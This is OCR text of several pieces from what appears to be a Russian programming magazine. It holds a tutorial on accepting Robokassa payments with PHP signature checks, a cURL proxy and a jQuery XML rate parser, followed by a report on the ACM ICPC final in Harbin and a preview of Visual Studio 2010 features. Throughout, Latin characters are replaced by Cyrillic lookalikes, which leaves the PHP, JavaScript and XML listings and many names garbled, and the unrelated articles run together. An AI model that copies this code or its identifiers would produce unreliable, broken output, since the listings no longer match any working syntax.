іІет=$зЬр_і1:епп:5Ьр_и5ег=$5Ьр_и5ег". Для 
того чтобы подпись не смог подделать злоу- 
мышленник, строка содержит переменную 
$тгЬ_разз1 — первый пароль мерчанта. 

Всего паролей два, оба задаются в личном 
кабинете на сайте РоЬоКазза. Важно помнить, 
что для однозначности дополнительные пара- 
метры запроса должны следовать в алфавит- 
ном порядке. 



2 . Робокасса отображает пользователю интер- 
фейс для оплаты, с учетом тех параметров, 
которые мы передали через ІІРЬ. Клиент 
выбирает удобный для себя вариант оплаты 
покупки и подтверждает намерение произве- 
сти перевод денег. 

3. Для того чтобы сообщить магазину об 
исходе транзакции, Робокасса особым обра- 
зом формирует ответ и передает его специ- 
альному РезиЬ-скрипту, который должен сде- 
лать следующее: во-первых, считать данные 
из ответа, во-вторых, сформировать по этим 
данным проверочную подпись (используется 
второй пароль) и проверить, чтобы подпись 
из ответа была равна проверочной. Если под- 
писи различны, то скрипт должен вернуть 
строку ВасІ зідп, иначе ОК<%номер заказа%>. 
В листинге ниже я привел основную часть 
РезиК-скрипта. 

//Считываем данные из ответа 
$оиС_зишт = $_КЕС>ІІЕ8Т [ "ОиСЗит" ] ; 

$ іпѵ ІЫ = $_КЕ01ШЗТ [ " ІПѴІСІ " ] ; 

$зЬр_іЦеш = $_КЕ01Ш8Т [ " ЗЬр_іЦет" ] ; 
$зЪр_изег = $_ЕЕ01ІЕ8Т [ " ЗЬр_изег " ] ; 

$ сгс = $_КЕ01Ш8Т[ 

" ЗідпаСигеѴаІие" ] ; 
$сгс = зСгДоиррег ( $сгс) ; 
//генерируем проверочную подпись 
$шу_сгс = зСгДоиррег (шсі5 ( " $оиС_ 
зишш: $іпѵ_іс1: $тг1і_разз2 : 81ір_ 
іЦеш=$зЬр_іЦеш: 8Ьр_изег=$зЬр_ 
изег" ) ) ; 

Остальные действия, которые могут быть 
выполнены в РезиЬ-скрипте, зависят от кон- 
кретной реализации твоего инет-магазина. Но 
нужно обязательно записать данные о про- 
веденной операции, то есть, образно говоря, 
пробить чек. 

ВЗГЛЯД СВЕРХУ 

Теперь, когда ты знаком со спецификаций 
АРІ-интерфейса РоЬоКазза, перейдем к раз- 
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Общая схема взаимодействия РобоКассы и нашего магазина 



работке платежки для магазина. Наша основ- 
ная цель — написать интерфейс для оплаты 
некоторой услуги. При разработке любого 
интерфейса мы должны в первую очередь 
помнить о его юзабильности, поэтому раз- 
рабатываемый интерфейс должен удовлетво- 
рять следующим критериям. 

Требуется выводить полный список под- 
держиваемых платежных систем, логиче- 
ски разделенных по группам (электронные 
деньги, терминалы, банковские переводы и 
т.д.). Покупатель может выбрать тот способ, 
которым ему наиболее удобно внести плату. 
Покажем покупателю, что мы о нем заботимся 
и предоставляем большой выбор вариантов 
оплаты. 

На странице со списком поддерживаемых 
платежек должна быть указана конечная 
стоимость услуги по этой платежке. Человек 
— существо рациональное, и очень часто 
бывает, что выбор платежки обусловлен 
только максимальной дешевизной. Покажем 
сразу конечную стоимость — честно поможем 
выбрать наиболее подходящий вариант. 

Таким образом, нам нужно реализовать 
страницу со списком платежек, при входе 
на которую должен запускаться а]ах-скрипт, 
запрашивающий курсы (по сути, конечную 
стоимость] по всем платежкам, затем произ- 
водящий парсинг ответа и подставляющий 
полученные значения на страницу. Нам также 
понадобится библиотека сигі: зачем это 
нужно и как с ней работать, станет понятно 
по ходу разработки функционала. 

СОЗДАЕМ КАРКАС 

Интерфейс платежки будет находиться в 
раутепІз.рЬр. Входными данными этого 
скрипта является параметр $М:ет — номер 
товара/заказа (зависит от реализации 
магазина], который передается методом 
6ЕТ. Скрипт раутепіз.рЬр сначала выводит 
информацию о заказе, а затем (для наглядно- 
сти] таблицу с логотипами поддерживаемых 



платежных систем. Ниже приведена структу- 
ра скрипта раутепІз.рЬр. 

<?рЛр 

//Фильтрация параметра іСеш 
//Выбор товара из БД по идентифи- 
катору ібеш 

//Формирование запроса к платежной 
системе 
?> 

«ііѵ іб= "хшІСопзоІе " > 

//Для отображения статуса запро- 
са стоимости для каждой платежной 
системы 
</<біѵ> 

<біѵ іб= "рау_зузбешз " > 

//"Обертка" для скрытия/отобра 
жения способов оплаты 

<СаЫе с1азз= "рау_ЬаЫе" > 
//Список поддерживаемых платеж- 
ных систем 
</СаЫе> 

</<біѵ> 

Для простоты в скрипте раутепІз.рЬр (как и 
все остальные скрипты ты можешь найти его 
на диске] вместо обращения к базе данных 
товаров магазина, я использую обычный 
оператор выбора зѵѵбсЬ. Когда же ты будешь 
писать рабочий скрипт для своего магазина, 
учти, что кроме выбора сведений о товаре 
из базы данных, тебе будет необходимо бро- 
нировать товар в соответствующей таблице. 
Естественно, что бронировать нужно на 
время, которое выделяется пользователю на 
оплату выбранного им товара. По истечении 
данного интервала времени товар должен 
быть автоматически снят с брони. Есть 
исключение: ты продаешь товар, который 
не может окончиться на складе (например, 
внутренняя электронная валюта сайта], или 
ты просто перекупаешь товар в других мага- 
зинах и автоматизировать процесс проверки 
наличия товара просто невозможно. 



Крайне важно досконально оттестировать 
скрипты, имеющие отношение к оплате. 
Хочу обратить твое внимание на одну 
деталь, а точнее предупредить тестеров 
скриптов. Если твой РезиЛ-скрипт будет 
недоступен или вернет в качестве ответа 
"баб відп", то это не значит, что платеж 
клиента не пройдет и/или будет отме- 
нен, наоборот, он скорее пройдет. Если 
пункт 2 общей схемы взаимодействия 
твоего магазина и РоЬоКазза, описанной 
в разделе организации платежа через 
РоЬоКазза, выполнен успешно, то платеж 
уже откатить нельзя. В этот момент деньги 
уже снялись с электронного счета клиен- 
та, более того, они уже перешли на твой 
счет в РоЬоКазза, о чем ты незамедли- 
тельно получишь уведомление на рабочий 
етаіі. Поэтому тестируй все внимательно, 
с деньгами все-таки приходится работать 
реальными! Основную отладку нужно про- 
водить на тестовом сервере РоЬоКазза, 
ИРЕ и спецификацию по работе с которым 
легко найти в разделе технической доку- 
ментации на официальном сайте. 



Рассмотрим структуру таблицы рау_1аЫе. Для 
каждой поддерживаемой платежки выделяем 
по две ячейки: первая для логотипа, вторая 
для указания стоимости платежа вида: 

Цена: <Ъ ісІ= " РауСосІе" ></Ъ> 

<Ь>руб . </Ъ> 

вместо РауСобе будут указаны соответ- 
ствующие идентификаторы для платежек. 
Например, для Яндекс.Денег — это РСР. 
Когда мы разбирались с организацией 
платежа через Робокассу, то научились 
формировать ИРЕ (переменная $игІ) для 
инициализации процесса оплаты. Чтобы 
указать Робокассе, с помощью какой именно 
платежной системы клиент хочет произвести 
оплату, необходимо дописать к переменной 
$игІ идентификатор платежки. 

<а ЦгеЕ= "<?рЦр есЬо 

$шг1. 1 &ІпсСиггЬаЬе1=РСК' ; ?>">ЯД</ 

а> 

Линки подобного вида повесим на каждый 
логотип платежки и строку, содержащую цену 
товара. 

ХМЬИНТЕРФЕЙС 
Р0В0КА38А И ЛШЕРѴ 

Еще одна проблема — отобразить стоимость 
товара в разных валютах, для чего нам 
потребуется узнать курсы для каждой из 
поддерживаемых платежек. Получить курсы 
можно через ХМІ_-интерфейс РоЬоКазза. 

Для этого необходимо составить и отправить 
ХМЬ-запрос методом Р05Т по адресу ѵѵѵѵѵѵ. 
гоЬохсЬапде.сот/хтІ/гаІе.азр . Запрос имеет 
следующий ВИД: 
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Оплатить 



До-цгие способы оплаты 



Электронные валюты 
ЯндексЛеньгм 
ММ К 

ммг 

ММЕ 

ѴѴШ 

ѵѵмв 

РШВ№пеуМЫ1 
РШД ЯВК Мопеу 
Р№ Единый Кошелек 
ЕагуРв^ 
Р№МеЬСл*сІ$ 



ДеныгнШМаііЯо 
ВУЙ БанкВКонтакте 

Банковские карты ѵ 




После подключения РобоКассы, 
можно добавить себя в список 
мазагинов на сайте платежной 
системы 



Стандартный интерфейс для оплаты услуг ВК 



<гоЬох . гаСе . гед> 

<оиЬ_сигг>ОІІТСІШК</ои1і_сигг> 
<тегс!запЦ_1одіп>Е0СШ< / 
тегс]запЦ_1одіп> 

<оиЦ_спЦ >СЕТ< / оиЦ_спЦ > 

</гоЬох . гаСе . гед> 

Тут ОІІТСІІРП — идентификатор исходящей 
валюты (определяется при регистрации 
мерчанта в системе РоЬоКазза), Б06ІЫ — 
логин мерчанта, СЫТ — на какую сумму будет 
совершена покупка. 

ХМІ_-ответ от РоЬоКазза согласно специфи- 
кации протокола будет иметь вид 

<гоЬох . гаСе . гезр> 

<геСѵа1>пКе1іСос1е</геЦѵа1> 

<оиЦ_сигг>з0иССиггЬаЬе1</оиЦ_сигг> 

<оиЦ_спЦ>пОиЦСоипЦ</оиЦ_спС> 

<сІаЦе>зВаЦеОВВС12 0</с1аЦе> 

<гаСе1ізС> 

<гаСе> 

<іп_сигг>зІпсСиггЬаЬе1</ іп_сигг> 
<іп_сигг_паше> 
з ІпсСиггЫате 
< / іп_сигг_пате> 
<ѵа1ие>пѴа1иеС</ѵа1ие> 
<іпз_рег_ХоиВ>пІпСоипВ 
</іпз_рег_ХоиС> 

</гаСе> 

</гаСе1ізС> 

</гоЬох . гаВе . гезр> 

где: пРеіСобе — код возврата, 0 — нет оши- 
бок, либо код ошибки (для информации по 
кодам ошибки см. техническую докуменатцию 
РоЬоКазза — ѵѵѵѵѵѵ. гоЬоказза.ги/Рос/Ри/ 
ІпІеНасе.азрх ); 

зОиіСиггБаЬеІ — идентификатор исходящей 
валюты; 

пОиіСоипІ — количество денежных знаков 
исходящей валюты; 

зПаІе(ЮВС120 — дата, на которую возвра- 
щено состояние курсов (формат "уууу-тт-бб 
Ы~і:тт:5з", О МТ) ; 

каждый тег <гаІе> описывает один курс, поэ- 
тому их будет столько, сколько платежек было 



подключено через РоЬоКазза. 

В теге <гаІе> нас интересуют атрибуты 
іп_сигг — идентификатор платежки, ранее в 
раутепІз.рЬр я его обозначил как РауСобе; 
и іпз_рег_ХоиЕ собственно то, ради чего и 
выполняем запрос, — цена, которую нужно 
оплатить пользователю, если он выберет эту 
платежку. 

Теперь, когда мы разобрались со специфи- 
каций ХМ І_- прото кол а РоЬоКазза, напишем 
парсер на ] 0 и е гу (скрипт гк_хтІ_іпЕ)з). 
Запрос будем отсылать через метод а)ах(). 

ВипсСіоп деСХМЬ(иг1, спВ) { 

$ .абах( { 

игі : игі , 

Суре : 1 РОЗТ 1 , 

сіаСаТуре : 1 хті ’ , 

сіаСа : {спС : спС} , 

ЪеЬогеЗепсІ: хтІЗСагС, 
зиссезз: хтІЗиссезз, 
еггог: хтІЕггог, 
сотрІеСе: хтІСотрІеСе 

}) ? 

} 

Функции деОСМЦ) передается два параметра. 
Первый параметр игі — непосредственно 
БРБ-адрес, куда необходимо отправить 
запрос. Второй параметр спі — стоимость 
товара в магазине. Функции, на которые 
ссылаются переменные в теле метода аіах(), 
а именно, хтІБіагІ, хтІЗиссезз, хтІЕггог, 
хтІСотрІеІе, я разберу позже. А пока необ- 
ходимо решить одну проблему. Дело в том, 
что в качестве параметра игі нельзя переда- 
вать ссылку на документ, который находится 
на другом домене. 

РНР-ПРОКСИ И ХМШТРКЕОиЕЗТ 

Метод аіах() библиотеки )0иегу для пере- 
сылки данных использует АРІ-функцию 
ХМБНирРециезЕ Благодаря технологии 
ХМБНИрРециез!: возможно выполнить НТТР- 
запрос, не перезагружая страницу. Чтобы 
злоумышленникам было сложнее проводить 
Х55-атаки, для ХМБНИрРециезІ установлен 
запрет для работы с внешними доменами. 



Например, если мы пишем скрипт зсгірідз, 
который находится на сервере зегѵі.сот, то 
не получится отправить запрос на зегѵ2.сот 
методом ХМБННрРециезЕ 
Для решения этой проблемы мы напишем 
небольшой прокси-скрипт гк_гаІе_ргоху.рЬр. 
Схема взаимодействия следующая: гк_хтІ_ 
іпіДз с помощью ХМБНМрРециезІ отправляет 
ХМБ-запрос гк_гаІе_ргоху.рЬр (расположен 
на нашем сервере), который с помощью 
библиотеки си гі ретранслирует запрос к ХМБ- 
интерфейсу РоЬоКазза, считывает ответ и 
возвращает его. Приступим. Код отправки 
ХМБ-запроса через библиотеку си гі выглядит 
следующим образом: 

сиг1_зеСорС ($013, С1ЖЬ0РТ_1ШЬ, 

$ШГІ ) ; 

сиг1_зеСорС ($013, СШЬОРТ_ 
КЕТОШТКАЫЗРЕК , 1 ) ; 
сиг1_зеСорС ($013, СШЬОРТЩТШЕОІІТ , 
20 ) ; 

сиг1_зеСорС ($с!з, СШЬОРТ_ 
РОЗТЕІЕЬВЗ, $гедиезС) ; 
сиг1_зеСорС ($с!з, СШЬОРТ_ 
НТТРНЕАВЕК, аггау ( ’ СоппесСіоп : 
сіозе ’ ) ) ; 

Переменная $игІ — адрес ХМБ-интерфейса 
РоЬоКазза, объявляется непосредственно в 
гк_гаІе_ргоху.рЬр. Переменная $гециез1: — 
это, в свою очередь, ХМБ-запрос, структуру 
которого мы разбирали ранее: 

$гедиезС = 1 сгоЪох . гаСе . гед> 1 ; 

$гедиезС .= ’ <оиС_сигг>К1Ж</ 
оиС_сигг> * ; 

$гедиезС .= 1 <тегсЬап1і_ 

1одіп><бето</тегс]загШ_1одіп> 1 ; 

$гедиезС .= ’ <оиС_ 
спС> 1 . $спС . 1 </оиС_спС> 1 ; 

$гедиезС .= 1 </гоЬох . гаСе . гед> 1 ; 

Для запроса используется тестовая учетная 
запись мерчанта — бето. 

Библиотека си гі очень проста в освоении, и 
очень изящна. Чтобы это оценить, посмотри 
на листинг чтения ответа и возвращения 
результата 
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[ -- ^аіі . рЬр 

| -- ігоадез 

| | — аз ах_лаіт_Ьаг . діі 

| ' — раутепсз_1одо 

| | — ЗВНГ_1одо . діЗЕ 

| | — ЫеЬСгейз_1одо . діі 

| | — еазу_рау_1одо . ді:Е 

| | — 1ідрау_1одо . рпд 

| | — ппопеутаіі-іодо . діі 

| | — гЪк_топеу_1одо.рпд 

| | — ѵк_1одо . діі 

| | — ы1_1одо . рпд 

| | — шп_1одо . рпд 

| ' — уапсіех_кюпеу_1одо . діі 

| — огйег . ъхр 
| — раутепъз . ркр 
| — гезиіъ . ркр 
| -- гк_гаъе_ргоху . рДр 
| — зсгіррз 

| I — здиегуо® 

| 4 — гк_хго1_іпі: . з з 

| — зъуіез 
| ' — ішаіп. сзз 

зиссезз . рігр 



Исходные файлы нашей системы 




> СІѴСІ 

На диске ты найдешь 
исходники скриптов 
для организации 
приема платежей 



$гезиШ = сшг1_ехес ($сЬ) ; 
йеасіег ( ’ СопСепС-Суре : СехС/хшІ' ) ; 
есНю $гезиШ; 

Все, скрипт РНР-прокси гк_га!;е_ргоху.рЬр написан. 
Теперь вернемся к парсеру. 

ДОБИВАЕМ ПАРСЕР 

А)ах-запросы теперь ходят через прокси, 
ХМІНМрВециезІ: работает, так как запрос идет на скрипт 
в своем домене. Осталось разобраться с функциями, на 
которые ссылаются переменные метода а)ах(]. Сначала 
второстепенные. Функция хтІЫагШ вызывается перед 
отправкой ХМІ_-запроса. С помощью данной функции я 
изменяю 055-стиль для элемента біѵ с іскхппІСопзоІе. 
Стиль а)ахІ_оасІегС55 отображает картинку в бэкграунде 
— статус выполнения запроса. Кстати спешу пореко- 
мендовать онлайн-сервис уумм^ахІоасИпію . который 
поможет сгенерировать всевозможные статусбары на 
любой вкус и цвет. Код функции хтІОіагШ приведен в 
листинге ниже. 



ІипсШоп хтІЗСагЦ (хЬгІпзСапсе) { 
$ ( " #хт1Сопзо1е " ) . 
асИСІазз ( " а^ ахЬоасІегСЗЗ " ) ; 

} 




Как ясно из названия хтІЕггогО, данная функция вызы- 
вается, если в ходе выполнения ХМІ_-запроса произошла 
ошибка. В случае возникновения ошибки выводится 
сообщение для пользователя и скрывается сПѵ-"обертка" 
с логотипами платежных систем. 

ІипсЦіоп хтІЕггог (хЬгІпзСапсе , шеззаде, 
орСіопаІ) { 

$ ( " #хт1Сопзо1е " ) . ІЩтІ ( 1 <Ь.2 > 
сЕопЦ со1ог= " гесС >Ошибка ! </ 1опЦ>Попробуйте 
повторить попытку позже</Ь.2> ' ) ; 

$ ( " #рау_зузСешз " ) . сзз ( 

' сіізріау ' , 1 попе ' ) ; 

} 

По завершении ХМІ_-запроса сначала выполняется 
функция хтІСотрІе1:е(], в теле которой у элемента с 
іб=хтЮоп5о[е удаляется 055-стиль а)ахІ_оасІегС55, а 
затем хт15иссезз(], в теле которой и происходит вызов 
функции рагзеХМЦ] — парсер для обработки ХМІ_-ответа. 
Реализация функции рагзеХМЦ) наглядно демонстрирует 
основной принцип библиотеки ] 0 и е гу — принцип нена- 
вязчивого ^ѵа5сгірЦ листинг ее приведен ниже. 

ПипсСіоп рагзеХМЦ (хті ) { 

//Для каждого тега <гаСе> в цикле 
выполни ем следующие действия 
$( хті ) . Ііпсі ( ' гаСе ' ) . еасЬ. ( ІипсЦіоп ( ) { 
//читаем идентификатор платежки 
ѵаг сигг =$ (Шз) . Ііпсі ( 1 іп_сигг ' ) . РехР ( ) ; 
//читаем стоимость в этой платежки 
ѵаг ѵаі = $ (ЦЦіз) . Ііпсі ( ' іпз_рег_ХоиЦ ' ) . 
СехР ( ) ; 

//в соответствующей ячейке - результат 
$ ( 1 # ' +сигг) . ИШтІ (ѵаі) ; 

}) ; 

} 

Теперь парсер написан полностью. Чтобы инициализиро- 
вать ХМІ_-запрос, распарсить его и вывести результат в 
раутепіз.рбр пишем 

<зсгірр Цуре= " РехС/з аѵазсгірЦ " > 

$ ( ІипсРіоп ( ) { 

<?р!ір 

$Ртр_оиР_зитт = (іпР) $оиР_зитт; 
есИю " деРХМЬ ( ' гк_гаРе_ргоху . рЪр ' , 
$Ртр_оиР_зитт) ; " ; 

?> 

}); 

</зсгірР> 

Функция деЕКМЦ) будет вызвана при загрузке страницы, 
точнее после того, как браузер построит БОМ-структуру 
документа. 

МОДЕРНИЗИРУЙ 

Вот и готов каркас для приема платежей через Робокассу. 
Полностью рабочие скрипты ты можешь использовать и 
своих проектах, практически сходу наладив прием пла- 
тежей. Сложно ли это было? Нет! Сам процесс работы с 
Робокассой очень прост. Больше времени ушло на обо- 
лочку, внешний вид, обустройства интерфейса для того, 
чтобы пользователю было удобно. Но именно это и важно 
для конечного клиента. И теперь нам есть что ему пред- 
ложить. □с 
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Команда МГУ и директор чемпионата АСМ ІСРС Билл Паучер 



Финал АСМ ІСРС: уехали с зо- 
лотом, но, увы, не чемпионы 

В этом году финал самого крупного турнира по 
программированию АСМ-ІСРС, спонсируемый 
компанией ІВМ, проходил в довольно экзоти- 
ческом месте. Когда мне сказали, что это будет 
Китай, я был уверен: наверняка, Пекин или 
Шанхай. Но ребята из ІВМ меня озадачили: 
«Нет, Стёпа, ты едешь в Харбин». Харбин?! 
Начиная когда-то как русская железнодорож- 
ная станция, город дорос до десяти миллио- 
нов населения и стал одним из крупнейших 
научных центров Китая. Именно сюда и собра- 
лись три сотни программистов со всего мира, 
чтобы принять участие в битве мозгов — люди 
не только чрезвычайно умные, но и смелые. В 
Харбине действительно очень холодно, стрел- 
ка термометра подчас опускается до минут 30 
градусов. Обычно участникам финала АСМ- 
ІСРС выдают разноцветные майки с эмблемой 
турнира и названием университета. В Харбине 
этого было мало: спортсменов-программистов 
надо не просто одеть так, чтобы отличить от 
прочей публики, но и защитить от мороза. В 
итоге распознать участников и организато- 
ров на улице (если, конечно, они рисковали 
выбраться из отеля или кампуса] было очень 
просто. Синяя куртка с капюшоном, теплые 
штаны и шапка-ушанка с символикой ІВМ — 
сразу видно, свой идет. Америнка-организатор 
шутит: «Да вам же не должно быть холодно»! 
Как же, кажется, мозг уже замерз. 

Всего в день соревнований участвовало 103 
команды. Несмотря на нашу победу в прошлом 
году (и позапрошлом, между прочим], фаво- 
ритами считались хозяева турнира- китайцы. 
Китай предсиавлен 20 командами. Тут надо 
сказать, что команда СПбГУ ИТМО, которая 
выиграла АСМ ІСРС год назад в Стокгольме, в 
этот раз не выступала. На отборочной стадии 
их обыграла другая команда того же ВУЗа, как 
говорят, слабее — но это спорт, и есть место 
везению. Всего от России приняло участие 1 1 
команд. Из США в финала пробилось аж 18 
университетов. Несмотря на громкие назва- 
ния вузов, многие оказались аутсайдерами, и 
красовались на последних местах турнирной 
таблицы. Ни одной решенной задачи? А вы 
говорите: «Силиконовая долина». Ха! 
Регламент соревнований не претерпел изме- 
нений. Все команды, каждая из трех студен- 
тов, собираются в одном большом помещении, 
где им дается 5 часов, чтобы решить 11 задач 
разной степени сложности. Задачи отбирает 
жюри строгой секретности, жюри состоит в 
основном из профессоров и преподавателей 



разных вузов — в общем, достать их зара- 
нее абсолютно нереально. Все задачи четко 
алгоритмические, но при этом, как правило, 
смоделированы на основе реальных проблем, 
входящих в «сферу интересов» инициати- 
вы ІВМ ЗппаНег Ріапеі: (Разумная планета] 

— таких, например, как создание электрон- 
ного расписания аэропорта для безопасной 
посадки самолетов, которое бы учитывало 
изменение погодных условий и другие неожи- 
данности, или оптимизация системы полива 
растений на сельскохозяйственном пред- 
приятии, или оценка воздействия изменения 
климата на вымышленную географическую 
территорию. Разработать систему для считы- 
вания штрихкода, рассчитать минимальную 
численность армии для взятия виртуальных 
замков, вычислить длину кратчайшего пути 
для капитана спасательной лодки, регулярно 
инспектирующего группу туристических остро- 
вов — все это пришлось решать участникам 
харбинского финала. Полные тексты заданий 
ты можешь найти на нашем диске. Стоит отме- 
тить, что все задания составлены на англий- 
ском языке, поэтому единственной книгой, 
которую допускается использовать участникам, 
является словарь. 

У каждой команды есть только один ком- 
пьютер с установленными компиляторами 
С, С++ и Заѵа — язык каждая команда могла 
выбирать по своему усмотрению. При этом 
задачи передаются на проверку полуавтома- 
тической системе, которая сама компилирует 
предоставленный код и прогоняет на тестовых 



результатах, проверяя разные аспекты работы 
программы. На выходе результаты сверяются 
с эталонными, после чего обновленные дан- 
ные по решенным задачам отображаются на 
общем табло и в онлайне. Помимо правиль- 
ности результата проверяется, укладывается 
ли программа в лимиты по времени, поэтому 
решения «в лоб» с помощью тупого перебора, 
хотя это и редко возможно, сразу отметается. 
Хочешь попробовать? Ради бога, но от штраф- 
ного балла не уйдешь. 

За 30 минут до окончания соревнования 
результаты на табло перестают отображаться, 
чтобы поддержать интригу. Пока на первом 
месте команда Шанхайского университета, 
но у нашего МГУ им. Ломоносова еще есть 
шансы. Мы смотрим на ребят, они что-то 
очень быстро делают: авось, еще получится? 
Будем первыми? Пошел обратный отсчет, 
сопровождаемый всеобщим ликованием 
«1:6 гее», «Іѵѵо», «опе» — время вышло. Увы, 
на объявлении результатов чуда не произо- 
шло. На первом месте оказались молодцы- 
китайцы из Шанхая, наши ребята из МГУ 
— на втором месте. Но это все равно золотая 
медаль: на АСМ-ІСРС вручается по четыре 
золотых, серебряных и бронзовых медали. 

В число призеров попали еще три россий- 
ские команды: Петрозаводский универси- 
тет, Саратовский университет (серебро] и 
Санкт-Петербургский университет (бронза]. 
Четвертое место завоевал Киевский универ- 
ситет. Очень достойно, но все равно жаль, что 
не первые, цц 
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НУЖНА ЛИ 
НАМ НОВАЯ СТУДИЯ? 



Новые фишки Ѵізиаі Зіисііо 2010 
из первых уст 



ВПЕРВЫЕ ѴІЗІМІ. ЗТІШІО ПОЯВИЛАСЬ ЕЩЕ 97 ГОДУ. С ТЕХ ПОР МІСК030ЕТ ИСПРАВНО КАЖ- 
ДЫЕ НЕСКОЛЬКО ЛЕТ ВЫПУСКАЕТ НОВУЮ ВЕРСИЮ, ВСЕ БОЛЬШЕ И БОЛЬШЕ ПРОКАЧИВАЯ 
ФУНКЦИОНАЛЬНОСТЬ СВОЕЙ СРЕДЫ РАЗРАБОТКИ. НА НОСУ - РЕЛИЗ ѴШІ_ ЗТІШІО 2010. 
ПОЭТОМУ МЫ ПОПРОСИЛИ САМИХ РЕБЯТ ИЗ МІСК050ЕТ РАССКАЗАТЬ, ЧТО ЖЕ ХОРОШЕГО 
НАС ЖДЕТ В ПРЕДСТОЯЩЕМ РЕЛИЗЕ. 



ерез пару лет напряженной работы, 
проб и ошибок, массы задуманных и 
реализованных идей, Ѵізиаі Зіисііо 
2010 получила официальную дату 
рождения — 1 2 апреля 2010. Запуск 
намечен какразнаДень Космонавтики :). 
Первая официальная бета версия была пред- 
ставлена на обсуждение еще в середине мая 
2009 года. Затем, в октябре того же года была 
выпущена вторая бета, после чего компания 
Майкрософт объявила официальную дату 
выхода продукта. Однако, по итогам публич- 
ного тестирования, было принято беспреце- 
дентное решение— продлить работу и даже 
перенести официальную дату релиза с целью 
улучшить производительностью. Что из этого 
получилось? Студия вполне комфортно себя 
чувствует даже на нетбуках с одним гигабай- 
том оперативки! За годы работы был нарабо- 
тан немалый объем новой функциональности, 
который едва ли можно уместить в рамках 
одной статьи. Поэтому мы сосредоточимся на 
области, напрямую связанной с разработкой 
— на работе программиста. 

ПЕРЕРАБОТАННЫЙ Ш 

Даже беглого взгляда на интегрирован- 
ную среду разработчика (ЮЕ — Іпіедгаіесі 
Оеѵеіортепі Епѵігоптепі) достаточно, чтобы 
заметить, что она была серьезно перера- 
ботана. Действительно: теперь интерфейс 
полностью выполнен с помощью технологии 



ѴѴіпсІоѵѵз Ргезепіаііоп Боипбаііоп (ѴѴРЕ). 
Верный способ показать, что с ее помощью 
можно создавать даже самые сложные и 
максимально гибкие интерфейсы. Впрочем, 
нам скорее интереснее разобраться, не как 
что реализовано, а что нового появилось. 

И это новое встречает нас с первых секунд 
после запуска. 

Бьюсь об заклад, что ты всегда отключа- 
ешь назойливую стартовую страницу — я 
использую Ѵ5 как основной инструмент для 
работы уже много лет, и отключить ее счи- 
тал своим долгом сразу после установки ЮЕ 
:). Видимо, подобных отзывов было очень 
много, поэтому в М5 решили серьезно ее 
переработать и теперь это вполне пригод- 
ный для использования инструмент. Кроме 
очевидного списка последних активных 
проектов, новая страница содержит массу 
другой информации и ссылок на справочные 
материалы. Опция «закрывать при открытии 
проекта» позволяет автоматически удалять 
ее из главного окна, сокращая тем самым 
количество закладок, в которых порой и так 
нелегко разобраться в больших проектах. 

А, поскольку сама она также выполнена 
на основе ѴѴРЕ, любой разработчик может 
с легкостью настроить ее под себя и свою 
команду. 

Впрочем, неудобство от появления малень- 
кого окошка вначале — это цветочки по 
сравнению с тем, что творилось через 



несколько часов работы на большом про- 
екте, когда все открытые окна и вкладки уже 
банально не влезали на экран. Мониторы с 
большим разрешением экрана лишь отчасти 
помогают решить данную проблему. Однако 
в Ѵізиаі Зіисііо 2010 было предложено гораз- 
до более удобное решение: правильная 
поддержка работы на нескольких мониторах. 
Суть нововведения проста: практически 
все основные окна среды являются неза- 
висимыми, «плавающими» по отношению к 
основному родительскому окну. Ты можешь 
легко «отстыковать» любое окно мышкой, и 
перенести его на другой монитор для более 
комфортной работы. 

НОВЫЕ ФИШКИ РЕДАКТОРА КОДА 

Больше всего времени разработчик про- 
водит с редактором кода, и несмотря на то, 
что в Ѵізиаі Зіисііо этот инструмент и без 
того чрезвычайно мощный, в 2010 версии 
он обзавелся несколькими очень полезными 
фишками. Например, при помощи нового 
инструмента Саіі Ніегагсбу (иерархия вызо- 
вов) теперь можно посмотреть зависимости 
вызовов ("кто вызывает ту или иную функ- 
цию?", "к каким методам она обращается в 
свою очередь") для любого метода, свойства 
или конструктора. Получается более про- 
двинутая вариация известного инструмента 
ЕіпсІ АН Реіегепсез. Это позволяет быстрее 
и проще разобраться в структуре кода, осо- 
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Главное окно новой версии ЮЕ 




Переработанная стартовая страница 
Ѵізиаі Біисііо 2010 
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бенно, когда имеешь дело с чужим кодом. 
Помимо этого, нередко бывает нужно 
просмотреть все участки кода, в которых 
используется определенная переменная, 
свойство или метод класса. До сих пор для 
этого приходилось выполнять поиск нужной 
информации по коду. В Ѵізиаі Эіисііо 2010 
достаточно установить курсор на нужный 
элемент, и все ссылки на него будут под- 
свечены фоновым цветом везде, где он 
используется. 

Впрочем, инкрементный поиск Ыаѵідаіе 
То («Перейти к...», вызывается при 
помощи СТПІ_+запятая) также получил 
свой Іеѵеі-ир и теперь позволяет найти 
информацию, в правильности написания 
которой ты неуверен. Секрет в том, что 
поисковый механизм использует и нечет- 
кую логину и поэтому вполне успешно 
справится со сложными случаями поиска. 
Например, с поиском слов, разделенных 
пробелами, в то время как в тексте про- 
граммы они написаны без них — частая 
ситуация с составными именами классов. 
Поиск начинается одновременно с вво- 
дом запроса, и результаты уточняются по 
мере завершения ввода строки запроса. 
Таким образом, зачастую нет необходимо- 
сти в воде полной строки запроса. 

Другая новая интересная функция — редак- 
тирование целого блока кода одновремен- 
но. Представь себе ситуацию: у тебя есть 
выровненный по вертикали блок объявле- 
ния полей некоторого класса и все поля 
помечены, как скрытые (ргіѵаіе). До сих пор, 
если вдруг тебе понадобилось изменить 
область видимости у всех полей одновре- 



менно, приходилось, тем или иным спосо- 
бом, строчка за строчкой менять их значе- 
ния на нужные. Теперь же, при помощи кла- 
виш 5НІРТ+АІ_Т и стрелок (или мышки] ты 
можешь выделить блок, содержащий только 
модификатор, который хочешь изменить, и 
вводить нужный. При этом информация во 
всем блоке будет заменена одновременно. 
Этим же способом очень удобно вставлять 
любой символ или набор символов в любое 
место кода, например, комментировать код 
при помощи символов 

Разработчики веб-приложений теперь могут 
пользоваться шаблонами кода (так назы- 
ваемые собе зпірреіз] в файлах НТМІ_ и при 
работе с ЭаѵаЗсгірЕ 

НОВЫЕ ИНСТРУМЕНТЫ ДЛЯ ОТЛАДКИ 

Едва ли кто будет спорить с утверждением, 
что возможности отладчика, наравне с ком- 
пилятором — ключ к успеху среды разработ- 
ки. И Ѵізиаі Эіисііо 2010 есть чем порадовать 
разработчиков. 

В этой версии были существенно расши- 
рены функции работы с точками останова 
и всплывающими подсказками. Все мы 
миллион раз пользовались подсказками 
для проверки текущего значения той или 
иной переменной. Не всегда есть необхо- 
димость добавлять интересующую пере- 
менную в специальное окно типа ѴѴаІсЬ: 
зачастую достаточно лишь навести курсор 
на нее, чтобы получить текущее значение 
